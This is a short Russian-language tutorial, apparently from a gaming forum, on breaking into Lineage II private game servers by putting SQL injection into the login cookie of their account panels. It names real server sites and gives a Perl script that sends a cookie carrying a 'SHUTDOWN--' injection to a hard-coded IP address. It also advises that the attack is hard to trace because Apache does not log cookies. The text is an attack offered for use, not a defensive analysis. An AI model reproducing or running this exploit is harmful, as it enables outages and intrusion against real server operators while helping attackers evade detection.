Если на вашем сервере не получается сделать инъекцию через сайт стандартными методами (будь то инъекция через страницу регистрации или другие "глючные" скрипты) не отчаивайтесь.
Возможно на сайте сервера есть "личный кабинет", в который вы входите используя свой логин и пароль (как например на la2.raid.ru или lineageii.ru) Скорее всего сделать инъекцию напрямую через поля login и password сделать не получится, т.к. администраторы наверняка сделали фильтр "зловредных символов". Но у таких личных кабинетов есть своё уязвимое место.
Заметим что одинажды зайдя на сайт, он "запоминает" нас делая запись с нашими логином и паролем в кукисы. Само собой когда мы в следующий раз зайдем на сайт, браузер автоматически пошлет наш логин и пароль из кукисов. Вот тут администраторы и чаще всего ошибаются, забыв сделать элементарную проверку кукисов, в расчете что пользователь не сможет их править, а зря!
Ниже приведен скрипт, который посылает наш кукис серверу, в котором содержится инъекция.
PHP код: язык - perl, думаю срипт можно будет без труда переписать на более близкий к вам по духу язык) #!/usr/bin/perl -w use IO::Socket; use strict; use CGI; my $host = '212.33.232.148'; #здесь host - IP сервера на который посылается куки (в нашем случае это рейд) my $EOL = "\015\012"; my $NL = "%0D%0A"; my $BLANK = $EOL x 2; my $remote = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => "http(80)"); unless ($remote) { die "cannot connect to http daemon on $host\n"; } $remote->autoflush(1); print $remote "GET /index.php HTTP/1.0".$EOL. "Cookie: login=\'SHUTDOWN--". $BLANK; while (0 and <$remote>) { print; # last if $. == 200; } close $remote;
У данной инъекции есть один весомый плюс: апач не пишет в свои логи кукисы, так что сделав инъекцию через них администраторы далеко не сразу поймут через что их взломали